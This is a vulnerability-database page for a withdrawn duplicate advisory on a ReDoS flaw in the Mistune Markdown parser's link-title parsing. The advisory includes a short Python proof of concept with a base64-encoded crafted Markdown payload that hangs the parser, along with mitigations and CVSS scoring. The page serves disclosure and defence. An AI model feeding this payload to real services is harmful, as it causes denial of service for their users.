Staging Environment: Content and features may be unstable or change without notice.
Search for vulnerabilities
Vulnerability details: VCID-sh4a-8vh7-ayb4
Vulnerability ID VCID-sh4a-8vh7-ayb4
Aliases GHSA-hjph-f4mc-wx4c
Summary Duplicate Advisory: Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-8mp2-v27r-99xp. This link is maintained to preserve external references. ### Original Description ### Summary **Denial-of-Service (DoS)** vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs. **Function affected:** parse_link_title() in helpers.py **Issue:** Malformed reference links cause excessive backtracking and parsing loops. **Impact:** Remote attackers can submit malicious Markdown to hang processes, causing service unavailability. ### Details ``` Name: mistune Version: 3.2.0 Python version: Python 3.13.9 PIP version: pip 25.2 OS: Kali-linux-VERSION="2025.4" ``` ### PoC ``` import mistune import base64 print("Exploit started....!") data = base64.b64decode( "WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg==" ) mistune.html(data.decode("utf-8", errors="ignore")) ``` ### Reproduce steps: Simply execute above python script it will hang & increase cpu utilization to 100% **Fuzzer Output (libFuzzer):** ``` ERROR: libFuzzer: timeout after 3 seconds SUMMARY: libFuzzer: timeout ``` **Stack Trace (Excerpt):** ``` mistune/helpers.py:170 in parse_link_title mistune/block_parser.py:259 in parse_ref_link mistune/core.py:216 in parse_method mistune/block_parser.py:458 in parse mistune/markdown.py:93 in parse mistune/markdown.py:120 in __call__ ``` ### IMAGE POC: <img width="1194" height="728" alt="POC" src="https://github.com/user-attachments/assets/009e836f-fff7-439e-b0be-6e889bed0077" /> ### Impact: Denial-of-Service (DoS) High CPU usage and application hang Potential for service unavailability in web apps or APIs processing untrusted Markdown ### Suggested Mitigations: Implement parsing depth and iteration limits. Limit reference-link title length. Detects excessive escape character sequences. Add defensive checks in parse_link_title. Add fuzz regression tests using the provided PoC. This vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently.
Status Published
Exploitability None
Weighted Severity None
Risk None
Affected and Fixed Packages Package Details
Weaknesses (1)
CWE-400 Uncontrolled Resource Consumption
System Score Found at
cvssv3.1_qr HIGH https://github.com/advisories/GHSA-hjph-f4mc-wx4c
cvssv4 7.7 https://github.com/lepture/mistune
generic_textual HIGH https://github.com/lepture/mistune
cvssv3.1_qr HIGH https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c
cvssv4 7.7 https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c
generic_textual HIGH https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c
Reference id Reference type URL
https://github.com/lepture/mistune
https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c
GHSA-hjph-f4mc-wx4c https://github.com/advisories/GHSA-hjph-f4mc-wx4c
No exploits are available.
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P Found at https://github.com/lepture/mistune
Attack Vector (AV) Attack Complexity (AC) Attack Requirements (AT) Privileges Required (PR) User Interaction (UI) Vulnerable System Impact Confidentiality (VC) Vulnerable System Impact Integrity (VI) Vulnerable System Impact Availability (VA) Subsequent System Impact Confidentiality (SC) Subsequent System Impact Integrity (SI) Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P Found at https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c
Attack Vector (AV) Attack Complexity (AC) Attack Requirements (AT) Privileges Required (PR) User Interaction (UI) Vulnerable System Impact Confidentiality (VC) Vulnerable System Impact Integrity (VI) Vulnerable System Impact Availability (VA) Subsequent System Impact Confidentiality (SC) Subsequent System Impact Integrity (SI) Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

No EPSS data available for this vulnerability.

Date Actor Action Source VulnerableCode Version
2026-05-31T10:58:04.792347+00:00 GithubOSV Importer Import https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-hjph-f4mc-wx4c/GHSA-hjph-f4mc-wx4c.json 38.6.0